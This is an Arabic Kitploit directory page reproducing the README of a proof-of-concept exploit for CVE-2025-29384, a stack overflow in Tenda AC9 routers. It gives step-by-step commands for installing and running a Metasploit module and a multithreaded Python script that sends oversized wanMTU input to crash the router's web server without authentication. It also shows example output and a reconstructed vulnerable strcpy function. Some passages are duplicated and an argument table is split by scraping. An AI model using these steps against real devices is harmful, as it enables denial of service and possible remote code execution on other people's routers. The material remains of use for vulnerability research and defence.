Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-29384-poc — استغلال لإثبات المفهوم لـ CVE-2025-29384، وهي ثغرة تجاوز سعة المخزن المؤقت القائمة على المكدس خطيرة في أجهزة التوجيه Tenda AC9. يتضمن وحدات Python و Metasploit لتعطيل الخدمة عن بعد بدون مصادقة واحتمالية تنفيذ تعليمات برمجية عن بعد على البرامج الثابتة المستندة إلى MIPS. | Kitploit
أدوات/GitHubGitHub/otsmane-ahmed/cve-2025-29384-poc
أمان الأنظمة المدمجةأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمان الأجهزة وإنترنت الأشياءالتعلم والتعليمتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
استغلال الملفات الثنائية
GitHubotsmane-ahmed/cve-2025-29384-poc

cve-2025-29384-poc

استغلال لإثبات المفهوم لـ CVE-2025-29384، وهي ثغرة تجاوز سعة المخزن المؤقت القائمة على المكدس خطيرة في أجهزة التوجيه Tenda AC9. يتضمن وحدات Python و Metasploit لتعطيل الخدمة عن بعد بدون مصادقة واحتمالية تنفيذ تعليمات برمجية عن بعد على البرامج الثابتة المستندة إلى MIPS.

عرض المستودع
141منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-29384 إثبات المفهوم (PoC) استغلال الثغرة

نظرة عامة

يحتوي هذا المستودع على استغلال متقدم لإثبات المفهوم (PoC) لـ CVE-2025-29384، وهي ثغرة خطيرة تجاوز سعة المخزن المؤقت (stack-based buffer overflow) تم اكتشافها في جهاز التوجيه Tenda AC9 الذي يعمل بإصدار البرنامج الثابت V15.03.05.14_multi. تسمح هذه الثغرة للمهاجمين عن بُعد دون مصادقة بتعطيل خادم الويب الخاص بالموجه (رفض الخدمة، DoS) وربما تنفيذ تعليمات برمجية عشوائية (تنفيذ تعليمات عن بُعد، RCE).

الغرض من هذا المشروع هو إظهار مهارات تطوير الاستغلال، والمساهمة في مجتمع الأمن السيبراني، وتقديم عرض تعليمي للتقييمات الأكاديمية (مثل المنح الدراسية للأمن السيبراني). يحتوي هذا المستودع على استغلال متقدم لإثبات المفهوم (PoC) لـ CVE-2025-29384، وهي ثغرة خطيرة تجاوز سعة المخزن المؤقت (stack-based buffer overflow) تم اكتشافها في جهاز التوجيه Tenda AC9 الذي يعمل بإصدار البرنامج الثابت V15.03.05.14_multi. تسمح هذه الثغرة للمهاجمين عن بُعد دون مصادقة بتعطيل خادم الويب الخاص بالموجه (رفض الخدمة، DoS) وربما تنفيذ تعليمات برمجية عشوائية (تنفيذ تعليمات عن بُعد، RCE).

الغرض من هذا المشروع هو إظهار مهارات تطوير الاستغلال، والمساهمة في مجتمع الأمن السيبراني، وتقديم عرض تعليمي للتقييمات الأكاديمية، مثل المنح الدراسية للأمن السيبراني.

تفاصيل الثغرة

وصف CVE

تؤثر CVE-2025-29384 على واجهة إدارة الويب لجهاز التوجيه Tenda AC9، وتحديداً نقطة النهاية:

root@kitploit:~
/goform/AdvSetMacMtuWan

توجد الثغرة بسبب عدم التحقق السليم من الحدود على معامل wanMTU، الذي تتم معالجته عبر طلب HTTP POST. يتم نسخ الإدخال إلى مخزن مؤقت ثابت الحجم على المكدس دون التحقق من الصحة، مما يؤدي إلى تجاوز سعة المخزن المؤقت (stack-based buffer overflow) الكلاسيكي.

التأثير

  • رفض الخدمة (DoS): تعطل خادم HTTP الخاص بالموجه، مما يجعله غير مستجيب حتى إعادة التشغيل.
  • احتمالية RCE: يمكن للمهاجم الكتابة فوق عنوان الإرجاع وتنفيذ تعليمات برمجية عشوائية على بنية MIPS الخاصة بالموجه.
  • لا حاجة للمصادقة: يمكن تشغيل الثغرة عن بُعد بدون بيانات اعتماد، مما يزيد من خطورتها.

التحليل الفني

تتبع الدالة المعرضة للخطر (إعادة بناء افتراضية) هذا الهيكل:

root@kitploit:~
void process_mtu(char *input) {
    char buffer[256];  // مخزن مؤقت ثابت الحجم على المكدس
    strcpy(buffer, input);  // لا يوجد فحص للطول، يسبب تجاوزاً
    // معالجة قيمة MTU...
}

المهاجم الذي يرسل حمولة كبيرة جداً (مثل 1024+ بايت) يكتب فوق الذاكرة المجاورة، بما في ذلك عنوان إرجاع الدالة، مما قد يؤدي إلى تنفيذ تعليمات.

نقاط CVSS v3.1: 9.8 (حرجة)

الجهاز المتأثر

Tenda AC9 هو موجه لاسلكي مزدوج النطاق بالمواصفات التالية:

  • وحدة المعالجة المركزية: Broadcom BCM4708 (MIPS 74Kc، ثنائي النواة، ~1 GHz)
  • ذاكرة الوصول العشوائي: 128 MB
  • الذاكرة الدائمة: 16 MB
  • Wi-Fi: مزدوج النطاق 802.11ac (AC1200)
  • المنافذ: 1x Gigabit WAN, 4x Gigabit LAN
  • البرنامج الثابت: V15.03.05.14_multi (مؤكد تأثره)

الجدول الزمني للإفصاح

  • 14 مارس 2025 – نشر CVE-2025-29384 على NVD/MITRE.
  • 17 مارس 2025 – تطوير واختبار هذا PoC.
  • 17 مارس 2025 – لا يوجد تصحيح رسمي من Tenda حتى هذا التاريخ.

تفاصيل استغلال PoC

وحدة Metasploit بلغة Ruby

يتضمن هذا المستودع أيضاً وحدة Metasploit بلغة Ruby لـ CVE-2025-29384. تتكامل الوحدة بسلاسة مع إطار Metasploit، مما يسمح لك باستغلال الثغرة باستخدام msfconsole.

كيفية استخدام وحدة Ruby

الخطوة 1: تنزيل الوحدة

root@kitploit:~
git clone https://github.com/Otsmane-Ahmed/cve-2025-29384-poc
cd cve-2025-29384-poc

الخطوة 2: نسخ الوحدة إلى Metasploit

حدد موقع ملف وحدة Ruby وانسخه إلى دليل exploits الخاص بـ Metasploit:

root@kitploit:~
cp tenda_ac9_stack_overflow.rb ~/.msf4/modules/exploits/linux/http/

ملاحظة: إذا كان الدليل غير موجود، قم بإنشائه:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/linux/http/

الخطوة 3: تشغيل Metasploit

ابدأ إطار Metasploit:

root@kitploit:~
msfconsole

قم بتحميل الوحدة:

root@kitploit:~
use exploit/linux/http/tenda_ac9_stack_overflow

الخطوة 4: تكوين وتشغيل الاستغلال

قم بتعيين عنوان IP الهدف:

root@kitploit:~
set RHOSTS <target_ip>

قم بتعيين حجم الحمولة (اختياري، الافتراضي هو 1024):

root@kitploit:~
set PAYLOAD_SIZE 2048

قم بتشغيل الاستغلال:

root@kitploit:~
run

مثال على الإخراج

root@kitploit:~
[*] Targeting Tenda AC9 at 192.168.0.1:80...
[*] Sending payload of size 2048...
[+] Payload sent successfully!
[*] Response: HTTP/1.1 200 OK...

النتائج المتوقعة

النجاح: يتعطل خادم الويب الخاص بالموجه، مما يسبب حالة رفض الخدمة (DoS).
الفشل: يظل الموجه قيد التشغيل، مما يشير إلى أنه قد لا يكون عرضة للخطر أو أنه يعمل بإصدار برنامج ثابت مصحح.

نظرة عامة على الاستغلال

هذا PoC هو استغلال قائم على Python يرسل إدخالاً كبيراً جداً إلى /goform/AdvSetMacMtuWan، مما يؤدي إلى تجاوز سعة المخزن المؤقت لـ تعطيل خادم الويب وعرض إمكانية RCE.

بيئة الاختبار

  • نظام التشغيل: Kali Linux
  • إصدار Python: 3.x
  • جهاز الاختبار: Tenda AC9 (البرنامج الثابت V15.03.05.14_multi)

الميزات

تعدد الخيوط – إطلاق محاولات استغلال متعددة متزامنة لتحقيق الموثوقية.

حمولات ديناميكية – إنشاء سلاسل هجوم عشوائية مشفرة بـ base64.

التسجيل – استخدام وحدة logging في Python لتصحيح الأخطاء المهيكل.

معاملات قابلة للتخصيص – ضبط IP الهدف، حجم الحمولة، وعدد الخيوط.

نظرة عامة على الاستغلال

هذا PoC هو استغلال قائم على Python يرسل إدخالاً كبيراً جداً إلى /goform/AdvSetMacMtuWan، مما يؤدي إلى تجاوز سعة المخزن المؤقت لـ تعطيل خادم الويب.

الاستخدام

المتطلبات الأساسية

  • Python 3.x
  • موجه Tenda AC9 مع البرنامج الثابت V15.03.05.14_multi

تشغيل الاستغلال

root@kitploit:~
python poc.py --target <router_ip> --size 2048 --threads 10
الوسائط:
الوسيطةالوصف
--targetعنوان IP للموجه (الافتراضي: 192.168.0.1)

مثال على الإخراج

root@kitploit:~
[+] CVE-2025-29384 Exploit Engine
[INFO] Target: 192.168.0.1
[INFO] Sending payload (2048 bytes)...
[WARNING] Target timeout - possible crash!
[INFO] Exploit sequence completed.

النتائج المتوقعة

النجاح: تصبح واجهة الويب الخاصة بالموجه غير مستجيبة (حالة DoS).

الفشل: لا يزال الموجه يستجيب (غير عرضة للخطر أو برنامج ثابت خاطئ).

التحقق

لتأكيد أن الاستغلال يعطل الموجه بنجاح، حاول إعادة تحميل واجهة الويب. إذا أصبحت غير مستجيبة، كان الهجوم ناجحاً. لمزيد من التحليل، افحص سجلات الشبكة بحثاً عن اتصالات مفصولة أو استخدم ping للتحقق من استجابة الجهاز.

إخلاء المسؤولية

هذا المشروع هو لأغراض تعليمية وأخلاقية فقط. الاستخدام غير المصرح به لهذا الاستغلال غير قانوني. المؤلف غير مسؤول عن إساءة الاستخدام أو الأضرار الناجمة عن هذا الرمز.

تم التطوير بـ ❤️ بواسطة Otsmane Ahmed هذا المشروع هو لأغراض تعليمية وأخلاقية فقط. الاستخدام غير المصرح به لهذا الاستغلال غير قانوني. المؤلف غير مسؤول عن إساءة الاستخدام أو الأضرار الناجمة عن هذا الرمز.

الترخيص

تم إصدار هذا المشروع بموجب رخصة MIT.

تنزيل الأداة
المقياسالقيمة
متجه الهجومالشبكة
تعقيد الهجوممنخفض
الامتيازات المطلوبةلا شيء
تفاعل المستخدملا شيء
تأثير السريةعالي
تأثير التكاملعالي
تأثير التوفرعالي
--sizeحجم الحمولة بالبايت (الافتراضي: 1024)
--threadsعدد الخيوط المتزامنة (الافتراضي: 5)